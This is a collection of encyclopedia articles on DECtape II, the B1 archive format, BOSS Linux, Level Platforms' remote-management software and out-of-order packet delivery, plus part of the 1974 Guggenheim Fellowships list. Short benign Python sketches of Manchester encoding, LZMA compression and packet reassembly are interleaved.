DECtape II was introduced around 1978 and has a similar block structure, but uses a much smaller tape (the same width as an audio compact cassette). The tape is packaged in a special, pre-formatted DC150 miniature cartridge consisting of a clear plastic cover mounted on a textured aluminum plate. The TU58 DECtape II drive has an RS232 serial interface, allowing it to be used with the ordinary serial ports that were very common on Digital's contemporary processors. Because of its low cost, the TU58 was fitted to several different systems (including the VT103, PDP-11/24 and /44 and the VAX-11/730 and /750) as a DEC-standard device for software product distribution, and for loading diagnostic programs and microcode. The first version of the TU58 imposed very severe timing constraints on the unbuffered UARTs then being used by Digital, but a later firmware revision eased the flow-control problems. The RT11 single-user operating system can be bootstrapped from a TU58, but the relatively slow access time of the tape drive makes use of the system challenging to an impatient user. Like its predecessor DECtape, and like the faster RX01 floppies used on the VAX-11/780, a DECtape II cartridge has a capacity of about 256 kilobytes. Unlike the original DECtape media, DECtape II cartridges cannot be formatted on the tape drive transports sold to end-users, and have to be purchased in a factory pre-formatted state. The TU58 is also used with other computers, such as the Automatix Autovision machine vision system and AI32 robot controller.
TU58 driver software is available for modern PCs running DOS. Early production TU58s suffered from some reliability and data interchangeability problems, which were eventually resolved. However, rapid advances in low-cost floppy disk technology, which had an inherent speed advantage, soon outflanked the DECtape II and rendered it obsolete. See also LINC additional material on LINCtape lineage and operation References External links TU56 DECtape Drive Information DECtape Documentation at bitsavers.org VT103 manual at bitsavers.org. Appendix A describes the TU58 interface protocol. DEC hardware History of computing hardware Computer-related introductions in 1963
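The Technical details section above notes that DECtape's data tracks use Manchester (phase) encoding, a self-clocking scheme in which every bit carries a mid-cell transition. The sketch below illustrates the general idea only; the 1 -> "10", 0 -> "01" convention is an assumption chosen for the example and is not taken from DEC documentation.

```python
# Illustrative sketch of Manchester (phase) encoding, the self-clocking scheme
# mentioned for DECtape's data tracks. Convention assumed here: 1 -> "10", 0 -> "01".
def manchester_encode(bits):
    """Encode a list of bits into a string of half-cell levels."""
    return "".join("10" if b else "01" for b in bits)

def manchester_decode(halves):
    """Decode pairs of half-cell levels back into bits."""
    pairs = [halves[i:i + 2] for i in range(0, len(halves), 2)]
    return [1 if p == "10" else 0 for p in pairs]

data = [1, 0, 1, 1, 0]
line = manchester_encode(data)          # "1001101001"
assert manchester_decode(line) == data  # round-trips cleanly
print(line)
```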
41630273
https://en.wikipedia.org/wiki/B1%20%28archive%20format%29
B1 (archive format)
B1 is an open archive file format that supports data compression and archiving. B1 files use the file extension ".b1" or ".B1" and the MIME media type application/x-b1. B1 incorporates the LZMA compression algorithm. A B1 archive combines a number of files and folders into one or more volumes, optionally adding compression and encryption. Construction of a B1 archive involves creating a binary stream of records and building volumes of that stream. The B1 archive format supports password-based AES-256 encryption. B1 files are created and opened with the format's native open-source B1 Pack Tool, as well as the B1 Free Archiver utility.

B1 Pack Project

B1 Pack is an open-source software project that produces a cross-platform command-line tool and a Java library for creating and extracting file archives in the B1 archive format. Source code of the project is published at GitHub. B1 Pack Project is released under the Apache License. The B1 Pack Tool module builds a single executable JAR file which can create, list, and extract B1 archive files from a command-line interface.

B1 format features
Support for Unicode names for files inside an archive.
Archives and the files inside them can be of any size.
Support for split archives that consist of several parts.
Integrity check with the Adler-32 algorithm.
Data compression using the LZMA algorithm.
Support for encryption with the AES algorithm.

API features
Instant creation of an archive without reading from/writing to a file system.
Producing only a byte range of an archive, e.g. for resuming downloads.
Streaming archive content without prior knowledge of all the files being packaged.

References

External links
B1 Pack Project

Archive formats Open formats
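The format description above names two off-the-shelf building blocks, LZMA compression and Adler-32 integrity checking. The sketch below demonstrates both using the Python standard library only; it operates on raw bytes and does not produce the actual B1 container layout.

```python
# Illustrative sketch: the two primitives the B1 format description mentions,
# LZMA compression and an Adler-32 checksum, via the Python standard library.
# This does NOT build a .b1 container; it only shows the underlying operations.
import lzma
import zlib

payload = b"example file contents " * 100

compressed = lzma.compress(payload)   # LZMA, the algorithm B1 uses for compression
checksum = zlib.adler32(payload)      # Adler-32, the algorithm B1 uses for integrity checks

print(len(payload), "->", len(compressed), "bytes, adler32 =", hex(checksum))
assert lzma.decompress(compressed) == payload
```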
20015881
https://en.wikipedia.org/wiki/Bharat%20Operating%20System%20Solutions
Bharat Operating System Solutions
Bharat Operating System Solutions (BOSS GNU/Linux) is an Indian Linux distribution derived from Debian. BOSS Linux is officially released in four editions: BOSS Desktop (for personal use, home and office), EduBOSS (for schools and the education community), BOSS Advanced Server and BOSS MOOL. The latest stable version, 8.0 ("Unnati"), was released on 11 July 2019.

Development

It is developed by the Centre for Development of Advanced Computing (C-DAC) in order to enhance and gain benefit from the use of Free and Open Source Software throughout India. BOSS Linux is a key deliverable of the National Resource Centre for Free and Open Source Software (NRC-FOSS). It has an enhanced desktop environment integrated with Indian language support and other software. The software has been endorsed by the Government of India for adoption and implementation on a national scale. BOSS Linux is an "LSB certified" Linux distribution: the software has been certified by the Linux Foundation for compliance with the Linux Standard Base (LSB) standard. It supports the Intel and AMD IA-32/x86-64 architectures up to version 6. From version 7, development shifted to the x86-64 architecture only.

Uses

As of 2019, very few institutions and individuals in India use BOSS. BOSS and LibreOffice are included in the school syllabus, but only a few schools teach this open-source software to students.

Version history

BOSS Linux has had seven major releases.

BOSS 5.0 (Anokha)
This release came with many new applications, mainly focused on enhanced security and user friendliness. The distribution includes over 12,800 new packages, and most of the software in the distribution has been updated (70% of all packages in Savir). BOSS 5.0 supports Linux Standard Base (LSB) version 4.1. The new version features XBMC to allow the user to easily browse and view videos, photos, podcasts, and music from a hard drive, optical disc, local network, and the internet.

BOSS 6.0 (Anoop)
There are several major updates in BOSS Linux 6.0 (Anoop) from 5.0 (Anokha). Notable changes include a kernel update from 3.10 to 3.16, a shift of system boot from init to systemd, full support of GNOME Shell as part of GNOME 3.14, an update to the GRUB version, Iceweasel being replaced by Firefox and Pidgin replacing Empathy, and updates to several repository versions of available programs as part of the release. BOSS Linux 6.0 also shipped with various application and program updates, such as updates to LibreOffice, X.Org, Evolution, GIMP, VLC media player, GTK+, GCC, GNOME Keyring, and Python. Localisation support also improved, with SCIM replaced by IBus integrated with the system settings. Indic languages enabled under "Region and Languages" are now mapped directly to IBus, and an on-screen keyboard layout is provided for all layouts. This release is fully compatible with LSB 4.1.

BOSS 7.0 (Drishti)
The biggest change over previous releases is that support for the x86 version has been dropped; the distribution is now only available for x86-64. Other notable changes include a Linux kernel update to 4.9.0, a GNOME update from 3.14 to 3.22, and software updates to various applications and programs with wide Indian language support and packages. This release aims at enhancing the user interface with more glossy themes and is coupled with the latest applications from the community.

BOSS 8.0 (Unnati)
The desktop environment changed from GNOME to Cinnamon.
See also Debian Comparison of Linux distributions Free culture movement Simputer References External links 2007 software Debian-based distributions Language-specific Linux distributions Operating system distributions bootable from read-only media X86-64 Linux distributions Indic computing Urdu-language computing State-sponsored Linux distributions Linux distributions
12756727
https://en.wikipedia.org/wiki/Level%20Platforms
Level Platforms
Level Platforms was a provider of remote monitoring and management (RMM) software products and services for managed services providers (MSPs), IT service providers and value-added resellers (VARs) that provide IT support services for small and medium size businesses (SMBs) and branch offices. It was purchased by AVG Technologies in 2013 and was merged into the company.

History

Level Platforms (LPI Level Platforms) was formed in 1999 as an international MSP serving SMBs. The company subsequently shifted its strategy to create the next generation of RMM software, releasing its initial Managed Workplace platform in May 2004. On 12 June 2013, Level Platforms (LPI Level Platforms) was acquired by AVG Technologies. Level Platforms' founder Peter Sandiford left AVG in January 2014.

Products

IT services providers in 30 countries around the world use Managed Workplace to deliver managed services to their small and midsized business customers. The software platform delivers integrated monitoring, management and automation capabilities, allowing service providers to manage all of their customers' complete IT environments, including computers, applications, security, IP telephony, cloud services and more, from a single web-based dashboard. The software is provided in cloud and on-premises editions. With Managed Workplace 2011, the company introduced features that allow MSPs to manage printers and imaging assets. With the release of Managed Workplace 2012, Level Platforms introduced Mobile Device Management (MDM) capabilities that allow MSPs to monitor, configure and secure smartphones and tablets that run on operating systems from Apple, Google, Microsoft and RIM. MDM features, such as the ability to collect detailed asset information, remotely configure devices, track location and restrict user access if required, allow MSPs to address critical security and administration concerns for end-clients as sensitive corporate material is shared and accessed on mobile devices. In July 2012, Level Platforms introduced enhanced mobile device security capabilities, including the ability to automatically reset passwords, lock devices or wipe all information when a device is lost. In December 2012, the company announced that it was the first RMM vendor delivering MDM features for iPhone 5 and iOS 6. Level Platforms also introduced white-label Network Operations Center (NOC) and Help Desk Services, fully integrated into the Managed Workplace RMM platform, to allow MSPs to deliver 24x7x365 remediation and support offerings. A number of corporations license Level Platforms' OEM Cloud Edition software to provide a private-labeled managed services platform to their channel partners, including Hitachi Systems, Synnex and Intel.

References

Software companies of Canada Software companies established in 1999 Companies based in Ottawa 1999 establishments in Ontario
24121493
https://en.wikipedia.org/wiki/Out-of-order%20delivery
Out-of-order delivery
In computer networking, out-of-order delivery is the delivery of data packets in a different order from the one in which they were sent. Out-of-order delivery can be caused by packets following multiple paths through a network, by lower-layer retransmission procedures (such as automatic repeat request), or by parallel processing paths within network equipment that are not designed to ensure that packet ordering is preserved. One of the functions of TCP is to prevent the out-of-order delivery of data, either by reassembling packets into order or by requesting retransmission of out-of-order packets. See also Packet loss Selective ACK IP fragmentation Head-of-line blocking External links RFC 4737, Packet Reordering Metrics, A. Morton, L. Ciavattone, G. Ramachandran, S. Shalunov, J. Perser, November 2006 RFC 5236, Improved Packet Reordering Metrics, A. Jayasumana, N. Piratla, T. Banka, A. Bare, R. Whitner, June 2008 https://web.archive.org/web/20171022053352/http://kb.pert.geant.net/PERTKB/PacketReordering http://www-iepm.slac.stanford.edu/monitoring/reorder/ https://www.usenix.org/conference/nsdi12/minion-unordered-delivery-wire-compatible-tcp-and-tls Packets (information technology)
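As a simplified illustration of the reassembly role the article attributes to TCP, the toy sketch below buffers segments that arrive out of order and releases data only once the byte stream is contiguous. It is a model of the idea, not an implementation of TCP, and the class and method names are ours.

```python
# Toy illustration of restoring in-order delivery on top of out-of-order arrival,
# in the spirit of TCP reassembly. Not an implementation of TCP itself.
class Reassembler:
    def __init__(self):
        self.expected = 0      # next byte offset the application should see
        self.buffer = {}       # out-of-order segments, keyed by byte offset

    def receive(self, seq, data):
        """Accept a segment; return whatever can now be delivered in order."""
        self.buffer[seq] = data
        delivered = []
        while self.expected in self.buffer:
            chunk = self.buffer.pop(self.expected)
            delivered.append(chunk)
            self.expected += len(chunk)
        return delivered

r = Reassembler()
print(r.receive(5, b"world"))   # [] -- segment arrives early and is buffered
print(r.receive(0, b"hello"))   # [b'hello', b'world'] -- gap filled, both released
```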
1568504
https://en.wikipedia.org/wiki/List%20of%20Guggenheim%20Fellowships%20awarded%20in%201974
List of Guggenheim Fellowships awarded in 1974
List of Guggenheim fellowship winners for 1974. United States and Canada fellows Hazard Adams, Byron W. and Alice L. Lockwoood Emeritus Professor of Humanities; Professor of English, University of Washington. Flavia Alaya, Professor of Literature and Cultural History, Ramapo College of New Jersey. Edward Alexander, Professor of English, University of Washington. Frederick J. Almgren Jr., deceased. Mathematics. J. L. Alperin, Professor of Mathematics, University of Chicago. Donald Appleyard, deceased. Urban Planning. Michael Asher, artist, Los Angeles. Jerold Stephen Auerbach, Professor of History, Wellesley College. John Norman Austin, Professor of Classics, University of Massachusetts Amherst. Andrew S. Bajer, Professor of Biology, University of Oregon. Paul Thornell Baker, Professor Emeritus of Anthropology, Pennsylvania State University. Korkut Bardakci, Professor of Physics, University of California, Berkeley. John Walton Barker, Jr, Emeritus Professor of History, University of Wisconsin–Madison. William Barrett, deceased. Philosophy. Robert Beauchamp, deceased. Fine Arts, Painting. Saul Benison, Professor of History;, Professor Emeritus of Environmental Health, College of Medicine, University of Cincinnati. John Calvin Berg, Rehnberg Professor of Chemical Engineering, University of Washington. Stephen Berg, poet; Professor of English, Philadelphia College of Art. Robert Allan Bernheim, Professor of Chemistry, Pennsylvania State University. Jacob Bigeleisen, Distinguished Professor Emeritus of Chemistry, Stony Brook University. George R. Bird, Professor of Chemistry, Rutgers University. Joseph Warren Bishop, Jr, deceased. Law. Nell Blaine, deceased. Fine Arts, Painting. Laura Bohannan, Professor of Anthropology, University of Illinois at Chicago Circle. Albert Boime, Professor of Art History, University of California, Los Angeles: 1974, 1984. Mark Boulby, Professor Emeritus of German, University of British Columbia. Barbara Cherry Bowen, Chair, Professor of French and Comparative Literature, Vanderbilt University, Nashville, TN. James B. Boyd, deceased. Biochemistry-Molecular Biology. Roberto G. Brambilla, Architect and Urban Designer, New York City. Roger Ware Brockett, An Wang Professor of Electrical Engineering and Computer Science, Harvard University. Frederick Phillips Brooks, Jr., Kenan Professor of Computer Science, University of North Carolina at Chapel Hill. Philip R. Brooks, Professor of Chemistry, Rice University. William Browder, Professor of Mathematics, Princeton University. George Bruening, Professor of Plant Pathology; Biochemist in Experiment Station, University of California, Davis. Jean Louis Bruneau, Professor of French and Comparative Literature, Harvard University. Gerald L. Bruns, William and Hazel White Professor, University of Notre Dame: 1974, 1985. Bob B. Buchanan, Professor of Molecular Plant Biology, University of California, Berkeley. Howard Buchwald, artist, New York City. Edwin Burmeister, Research Professor of Economics, Duke University. Walter Dean Burnham, Professor of Political Science, University of Texas at Austin. Richard L. Bushman, Morris Professor of History, Columbia University. Joseph A. Callaway, deceased. Senior Professor Emeritus of Old Testament, Southern Baptist Theological Seminary. Martin C. Carey, Professor of Medicine and Professor of Health Sciences and Technology, Harvard Medical School. Stephen McKinley Carr, architect, Arrowstreet, Inc., Cambridge, Massachusetts. Ronald A. 
Castellino, Chair, Department of Medical Imaging, Memorial Sloane-Kettering Cancer Center, New York City. Matthew Y. Chen, Professor of Linguistics, University of California, San Diego. Fredi Chiappelli, deceased. Italian Literature. Allen T. Y. Chwang, Sir Robert Ho Tung Professor and Department Head of Mechanical Engineering, University of Hong Kong . William A. Clemens, Professor of Paleontology, University of California, Berkeley. William Brooks Clift, III, photographer, Santa Fe, New Mexico: 1974, 1980. Clarence Lee Cline, Ashbel H. Smith Professor Emeritus of English, University of Texas at Austin. George Cohen, Professor Emeritus of Art, Northwestern University Frank Van Deren Coke, Continuing Visiting Professor, School of Art, Arizona State University, Tempe, Arizona. Allan Meakin Collins, Research Professor of Education, Boston College and Professor of Education & Social Policy, Northwestern University. Alfred Fletcher Conard, Henry M Butzel Professor Emeritus of Law, University of Michigan. Carl Allin Cornell, Professor of Civil Engineering. James Welton Cornman, deceased. Philosophy. Thomas Joseph Cottle, Professor of Education, Boston University. Diana Crane, Professor of Sociology, University of Pennsylvania. Ernest R. Davidson, Distinguished Professor of Chemistry, Indiana University. Bertram H. Davis, Professor of English, Florida State University. Gene Davis, deceased. Fine Arts. Kenneth Sydney Davis, deceased. Biography. John M. Deutch, Institute Professor of Chemistry, Massachusetts Institute of Technology. Michael Di Biase, photographer. Penelope Billings Reed Doob, Professor of English and Multidisciplinary Studies, York University, Ontario, Canada. Jack Daniel Douglas, Professor of Sociology, University of California, San Diego. James Dow, photographer; Instructor in Photography, School of the Museum of Fine Arts, Boston. Brian Dutton, deceased. Spanish and Portuguese Literature. Clifford John Earle, Jr., Professor of Mathematics, Cornell University. Harry Eckstein, deceased. UCI Distinguished Professor and Professor of Political Science, University of California, Irvine. Scott McNeil Eddie, Professor of Economics, University of Toronto. Robert S. Edgar, Professor Emeritus of Biology, University of California, Santa Cruz. Russell Edson, writer, Darien, Connecticut. William J. Eggleston, photographer, Memphis. Eldon J. Epp, Harkness Professor Emeritus of Biblical Literature and Dean Emeritus of Humanities and Social Sciences, Case Western Reserve University. Solomon David Erulkar, deceased. Neuroscience. Susan M. Ervin-Tripp, Professor of Rhetoric, University of California, Berkeley. Stephanie Evanitsky, choreographer, New York City. Thomas E. Everhart, President Emeritus, California Institute of Technology. Gerald David Fasman, Louis I. and Bessie Rosenfield Professor of Biochemistry, Brandeis University: 1974, 1988. Joel Feinberg, Regents Professor of Philosophy and Law, University of Arizona. Gerald R. Fink, American Cancer Society Professor of Genetics, Whitehead Institute for Biomedical Research, Massachusetts Institute of Technology. Frank W. Fitch, Albert D. Lasker Professor Emeritus in the Medical Sciences; Director, The Ben May Institute, University of Chicago. George William Flynn, Eugene Higgins Professor of Chemistry, Columbia University. Paul Foster, playwright; President, La Mama Theatre, New York City. Primous Fountain, composer, Chicago: 1974, 1977. Phyllis Joan Freeman, senior editor, translator, and scholar, Great Neck, New York. Donald M. 
Friedman, Professor of English, University of California, Berkeley. Frank Gagliano, playwright; Benedum Professor of Playwriting, University of West Virginia. Richard Newton Gardner, Professor of Law and International Organization, Columbia University. George Palmer Garrett, writer; Henry Hoyns Professor of English, University of Virginia at Charlottesville. Theodore Henry Geballe, Theodore and Sydney Rosenberg Professor Emeritus of Applied Physics, Stanford University. Irma Gigli, The Walter and Mary Mischer Professor in Molecular Medicine, University of Texas Health Science Center, Houston. Charles Ginnever, artist, New York City. Seymour Ginsburg, Fletcher Jones Professor of Computer Science, University of Southern California. Ira Gitler, Jazz Faculty, Manhattan School of Music Dohn George Glitz, Emeritus Professor of Biological Chemistry, University of California, Los Angeles. Bernard R. Goldstein, Associate Professor, Jewish Studies Program and Department of History and Philosophy of Science, University of Pittsburgh. Melvin J. Goldstein, Senior Investigator, Bromine Compounds, Ltd., Beer Sheva, Israel. Robert E. Goldstein, Director, Division of Cardiology; Professor of Medicine and Physiology, Uniformed Services University of the Health Sciences, Bethesda, Maryland. Emmet Gowin, photographer; Professor of Photography, Princeton University. Martin Burgess Green, Emeritus Professor of English, Tufts University: 1974, 1977. Stephen J. Greenblatt, Harry Levin Professor of Literature, Harvard University: 1974, 1982. Leonard Gross, Professor of Mathematics, Cornell University. Howard E. Gruber, Professor of Psychology, Teachers College, Columbia University. Werner L. Gundersheimer, director, Folger Shakespeare Library, Washington, D.C.. Jean Howard Hagstrum, deceased. 18th Century English Literature. David Nicholas Hancock, deceased. Film. Joel F. Handler, Professor of Law, University of California, Los Angeles. Louis Rudolph Harlan, Distinguished Professor of History, University of Maryland, College Park. Robert Haselkorn, Fanny L. Pritzker Distinguished Service Professor of Biophysics and Theoretical Biology, University of Chicago. Shirley Hazzard, writer, New York City. Eliot S. Hearst, Adjunct Professor of Psychology, University of Arizona. Barbara Hinckley, deceased. Political Science. Peter Crafts Hodgson, Charles G. Finney Professor of Theology, Vanderbilt University. Jill Hoffman, poet, New York City. William M. Hoffman, playwright, New York City. Harry P. C. Hogenkamp, Professor of Biochemistry, University of Minnesota. Paul Hollander, Professor of Sociology, University of Massachusetts Amherst. Ralph Leslie Holloway, Jr., Professor of Anthropology, Columbia University. Raymond Frederick Hopkins, Richter Professor of Political Science, Swarthmore College. William DeWitt Horrocks, Jr., Professor of Chemistry, Pennsylvania State University. Richard G. Hovannisian, Professor of History, University of California, Los Angeles. Sandria Hu, Artist; Professor of Art, University of Houston at Clear Lake City. Francis Gilman Hutchins, director, Amarta Press, West Franklin, New Hampshire. John Woodside Hutchinson, Gordon McKay Professor of Applied Mechanics, Harvard University. Akira Iriye, Professor of American Diplomatic History, University of Chicago. James Francis Ivory, filmmaker, New York City. John M. Jacobus, Professor of Art, Dartmouth College. Charles Wilson Brega James, deceased. Fine Arts Research. Martin E. Jay, Professor of History, University of California, Berkeley. 
Robert Eugene Jensen, Professor of Accounting, Trinity University. Robert Earl Johannes, marine ecologist, Tasmania, Australia. Gerald Jonas, Writer, New York City. Sanford H. Kadish, Morrison Professor Emeritus of Law, University of California, Berkeley. Sidney Henry Kahana, Senior Scientist, Brookhaven National Laboratory. Michael Kassler, Managing Director, Michael Kassler and Associates, McMahons Point, Australia. Israel Joseph Katz, Research Associate, Teaneck, NJ. Jane A. Kaufman, artist, New York City. Donald R. Kelley, James Westfall Thompson Professor of History, Rutgers University: 1974, 1981. George Armstrong Kelly, deceased. Political Science. Norman Kelvin, Professor of English, City College, City University of New York: 1974. Tracy S. Kendler, deceased. Emeritus Professor of Psychology, University of California, Santa Barbara. Frank J. Kerr, Professor Emeritus of Astronomy, University of Maryland. André Kertész, deceased. Photography. Robion Cromwell Kirby, Professor of Mathematics, University of California, Berkeley. Lewis J. Kleinsmith, Arthur F. Thurnau Professor of Biology, University of Michigan. Bettina L. Knapp, Professor of Romance Languages and Comparative Literature, Hunter College and Graduate Center, City University of New York. Etheridge Knight, deceased. Poetry. Alan J. Kohn, Professor of Zoology, University of Washington. Philip A. Kuhn, Francis Lee Higginson Professor of History and of East Asian Languages and Civilizations, Harvard University. Meyer Kupferman, composer; Emeritus Professor of Composition and Chamber Music, Sarah Lawrence College. Phyllis Lamhut, choreographer; Artistic Director, Phyllis Lamhut Dance Company, Inc.; Instructor, Tisch School of the Arts, New York University. Elinor Langer, writer; Portland, Oregon. James S. Langer, Professor of Physics, University of California, Santa Barbara. Christopher Lasch, deceased. U.S. History. Bibb Latané, Professor of Psychology, University of North Carolina at Chapel Hill. James Ronald Lawler, Edward Carson Waller Professor of French, University of Chicago. John Scott Leigh, Jr., Professor of Biochemistry/Biophysics, Director, Metabolic Magnetic Resonance Research Center, University of Pennsylvania. J. A. Leo Lemay, H. F. du pont Winterthur Professor of English, University of Delaware. James T. Lemon, Emeritus Professor of Geography, University of Toronto. Fred Lerdahl, composer; Fritz Reiner Professor of Music Composition, Columbia University. Barry Edward Le Va, artist, New York City. David Ford Lindsley, Associate Professor of Physiology, University of Southern California School of Medicine. Stuart Michael Linn, Head, Professor of Biochemistry, University of California, Berkeley. Edgar Lipworth, deceased. Particle Physics. Robert Shing-Hei Liu, Professor of Chemistry, University of Hawaii at Manoa. Leon Livingstone, Professor Emeritus of Spanish, State University of New York at Buffalo. Claudia A. Lopez, writer; editor emeritus, The Papers of Benjamin Franklin, Yale University. Susan Lowey, Professor of Biochemistry, Brandeis University. Joaquin Mazdak Luttinger, deceased. Physics. James Karl Lyon, Scheuber-Veinz Professor of German, Brigham Young University. Frank MacShane, writer; Professor of Writing School of the Arts, Columbia University. Leon Madansky, Decker Professor of Physics, Johns Hopkins University. William Majors, deceased. Fine Arts-Graphics. Edward E. Malefakis, Professor of History, Columbia University. 
John Frederick Manley, Associate Professor of Political Science, Stanford University. Nicholas Marsicano, deceased. Fine Arts-Drawing. Donald B. Martin, Emeritus Professor of Medicine, University of Pennsylvania. Jack Matthews, writer; Distinguished Professor of English, Ohio University. John Patrick McCall, Consultant, Xavier University, New Orleans, Louisiana; President Emeritus and Professor Emeritus of English, Knox College. Frank D. McConnell, deceased. 19th Century English Literature. Tom McHale, deceased. Fiction. John Paul McTague, associate director, Office of Science and Technology Policy, Washington DC. Mark Medoff, playwright; Professor Emeritus of Theatre Arts & English, New Mexico State University. Joan P. Mencher, Professor of Anthropology, The Graduate Center, City University of New York. Roger Mertin, photographer; Professor of Fine Arts, University of Rochester. Christopher Middleton, writer; David J. Bruton Centennial Professor Emeritus of Germanic Languages, University of Texas at Austin. Barbara Stoler Miller, deceased. East Asian Studies. Clement A. Miller, Professor Emeritus of Fine Arts, John Carroll University. Harold A. Mooney, Paul S. Achilles Professor of Environmental Biology, Stanford University. George H. Morrison, Professor of Chemistry, Cornell University. Raymond Dale Mountain, NIST Fellow. Michael Murrin, Professor of English and of the Humanities, and Professor of Religion and Literature, University of Chicago. Thea Musgrave, composer, New York City; Distinguished Professor of Music, Queens College, CUNY, Flushing NY: 1974, 1982. Pandit Pran Nath, deceased. Music Composition. Victor Saul Navasky, writer; publisher, editorial director, The Nation, New York City. Alan H. Nelson, Professor of English, University of California, Berkeley. Gerry Neugebauer, Professor of Physics, California Institute of Technology. Charles Newman, writer; Professor of English, Washington University. Brian E. Newton, Professor Emeritus of Linguistics, Simon Fraser University Ernest Pascal Noble, Pike Professor of Alcohol Studies, University of California, Los Angeles. Richard Nonas, artist, New York City. Barbara Novak, Professor of Art History, Barnard College, Columbia University. Wallace Eugene Oates, Professor of Economics, University of Maryland, College Park. Ken T. Ohara, photographer, Glendale, California. Tetsu Okuhara, pPhotographer, New York City. Bernard Jay Paris, Emeritus Professor of English, University of Florida. Hershel Parker, H. Fletcher Brown Professor of American Romanticism, University of Delaware. Robert Ladislav Parker, Associate Professor of Geophysics, University of California, San Diego. Philip Pechukas, Professor of Chemistry, Columbia University. Joel Perlman, artist; Instructor in Fine Arts, School of Visual Arts, New York City. Robert P. Perry, senior member, Institute for Cancer Research; Professor of Biophysics, University of Pennsylvania. Barbara G. Pickard, Professor of Biology, Washington University. Robert Pirsig, writer, Portsmouth, New Hampshire. Richard Poirier, Marius Bewley Professor of English, Rutgers University. Edward C. Prescott, Professor of Economics, University of Minnesota. Douglas Radcliff-Umstead, deceased. Italian Literature. J. Austin Ranney, Professor of Political Science, University of California at Berkeley. Klaus Raschke, Professor, Plant Physiology Institute, University of Göttingen. Edward Reich, Distinguished Professor of Pharmacology, SUNY at Stony Brook. Erica Reiner, John A. 
Wilson Distinguished Service Professor Emeritus of Assyriology, University of Chicago. Richard Rhodes, writer, Cambridge, Massachusetts. Frank M. Richter, Chair, Professor of Geophysics, University of Chicago. Robert E. Ricklefs, Curators' Professor of Biology, University of Missouri-St. Louis. Brunilde S. Ridgway, Rhys Carpenter Professor Emeritus of Classical and Near Eastern Archaeology, Bryn Mawr College. Richard Robbins, Professor Emeritus of Sociology, University of Massachusetts Boston. Fred Colson Robinson, Douglas Tracy Smith Professor of English, Yale University. James William Robinson, Emeritus Professor of Chemistry, Louisiana State University (Baton Rouge). Paul Sheldon Ronder, deceased. Film. David Rosand, Meyer Schapiro Professor of Art History, Columbia University. Fred S. Rosen, President, Center for Blood Research and James L. Gamble Professor of Pediatrics, Harvard Medical School. Milton J. Rosenberg, Professor of Psychology, University of Chicago. Lillian Ross, writer; staff Writer, The New Yorker Magazine. John Roger Roth, Distinguished Professor of Biology, University of Utah. Albert Rothenberg, Clinical Professor of Psychiatry, Yale University. Jerome Rothenberg, poet; Emeritus Professor of English, University of California-San Diego. Lawrence Ryan, Professor of German, University of Massachusetts Amherst. Ryuzo Sato, C.V. Starr Professor of Economics, New York University. R. Murray Schafer, composer, Occidental, California. Paul Namon Schatz, Emeritus Professor of Chemistry, University of Virginia. Leo F. Schnore, deceased. Sociology. David Schoenbaum, Professor of History, The University of Iowa. John Luther Schofill, Jr., filmmaker, Seaside, California. Martin E. Seligman, Bob and Arlene Kogod Term Chair, University of Pennsylvania. Edwin Bennett Shostak, artist, New York City. Marcia B. Siegel, Emeritus Professor of Performance Studies, New York University. David Oliver Siegmund, Professor of Statistics, Stanford University. Paul B. Sigler, Professor and Investigator, Howard Hughes Medical Institute, Yale University. Thomas Elliott Skidmore, Carlos Manuel de Céspedes Professor of Modern Latin American History, Brown University. Lawrence Sklar, William K. Frankena Collegiate Professor and Professor of Philosophy, University of Michigan. Douglas Milton Sloan, Associate Professor of History and Education, Teachers College, Columbia University. Patricia H. Sloane, Professor of Art, New York City Community College, City University of New York. Steven Sloman, artist; Instructor in Painting and Associate Dean, New York Studio School. Henry Nash Smith, deceased. American Literature. Walter L. Smith, Statistics. Roman Smoluchowski, deceased. Physics. Robert Somerville, Professor of Religion and History, Columbia University: 1974, 1987. Frederick Sommer, deceased. Photography. James Keith Sonnier, artist, New York City. Pseudonym: Sonnier, Keith. Edward A. Spiegel, Professor of Astronomy, Columbia University. Hans-Peter Stahl, Andrew W. Mellon Professor of Classics, University of Pittsburgh. Robert Culp Stalnaker, Professor of Philosophy, M.I.T., Cambridge, MA. Howard Stein, Professor of Philosophy, University of Chicago. Ralph Steiner, deceased. Film. Alfred C. Stepan, Burgess Professor of Political Science, Columbia University. Shlomo Sternberg, Professor of Mathematics, Harvard University. David F. Stock, Composer; Professor of Music, Duquesne University, Pittsburgh. 
Alfred Stracher, Chairman, Distinguished Professor of Biochemistry, State University of New York Downstate Medical Center at Brooklyn. Mark Strand, poet; Andrew MacLeish Distinguished Service Professor, University of Chicago. William B. Streett, Joseph Silbert Dean of Engineering, Emeritus, Cornell University. Jack L. Strominger, Higgins Professor of Biochemistry, Harvard University. Robert Dale Sweeney, Classics, Fayetteville, Tennessee. Julian Szekely, deceased. Engineering. William Tarr, sculptor, Sarasota, Florida. Alexander Theroux, writer, West Barnstable, Massachusetts. Charles Tilly, Professor of Sociology, Columbia University. Humphrey Tonkin, President Emeritus; University Professor of the Humanities, University of Hartford. Preston A. Trombly, composer, New York City. Alwyn Scott Turner, photographer, Manzanita, Oregon. Robert Y. Turner, Professor of English, University of Pennsylvania. James A. Turrell, artist, Flagstaff, Arizona. Paolo Valesio, Director of Graduate Studies; Professor of Italian Linguistics, Yale University. John Britton Vickery, Vice Chancellor, University of California, Riverside. David Von Schlegell, Deceased. Fine Arts, Sculpture. Alexander Vucinich, Professor Emeritus of History and Sociology of Science, University of Pennsylvania: 1974, 1985. R. Stephen Warner, Professor of Sociology, University of Illinois at Chicago. Watt Wetmore Webb, S. B. Eckert Professor in Engineering and Professor of Applied Physics, Cornell University. Michael A. Weinstein, Professor of Political Science, Purdue University. William Ira Weisberger, Professor of Physics, State University of New York at Stony Brook. Ulrich W. Weisstein, Professor Emeritus of Comparative Literature and of Germanic Studies, Indiana University. Raymond O'Neil Wells, Jr., Professor of Mathematics, Rice University. Frank Simon Werblin, Associate Professor of Electrical Engineering and Computer Sciences, University of California, Berkeley. Winthrop Wetherbee, Avalon Foundation Professor in the Humanities, Cornell University. Donald F. Wheelock, composer; Associate Professor of Music, Smith College: 1974, 1984. Reed Whittemore, Professor of English, University of Maryland, College Park. Appointed as Whittemore, Edward Reed. C. K. Williams, poet, Greensboro, North Carolina. Gernot Ludwig Windfuhr, Professor of Iranian Studies, University of Michigan. Marian Hannah Winter, Deceased. Theatre Arts. Eugene Victor Wolfenstein, Professor of Political Science, University of California, Los Angeles. Don Worth, photographer; Professor of Art, San Francisco State University. Jay Wright, poet, Bradford, Vermont. Sanford Wurmfeld, artist; Chair, Professor of Art, Hunter College, City University of New York. Bertram Wyatt-Brown, Richard J. Milbauer Professor 